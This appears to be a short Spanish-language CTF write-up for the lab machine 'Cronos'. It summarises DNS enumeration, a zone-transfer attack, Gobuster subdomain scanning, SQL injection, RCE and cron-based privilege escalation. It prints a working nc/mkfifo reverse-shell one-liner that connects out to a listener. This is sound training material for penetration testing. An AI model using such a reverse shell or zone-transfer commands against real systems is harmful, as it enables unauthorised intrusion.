Cronos

Resumen de la resolución

Enumeración de servicio DNS expuesto con nslookup y dig
Enumeración de rutas http y subdominios con Gobuster
Explotación SQLi básica
Reverse shell explotando vulnerabilidad RCE
Escalada de privilegios abusando de script php corriendo como tarea Cron en la máquina víctima

Habilidades adquiridas

Enumeración de Name Servers con nslookup

nslookup
server <IP>
<IP>

Ataque de transferencia de Zona DNS para enumerar subdominios

dig axfr @<IP> <dominio.tld>

Comandos y herramientas destacables

Enumeración de subdominios con Gobuster

gobuster vhost -u http://<dominio.tld> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 --no-error

Reverse Shell nc mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f

Walkthrough en YouTube:

AnteriorTraverxec SiguienteActive

Última actualización hace 10 meses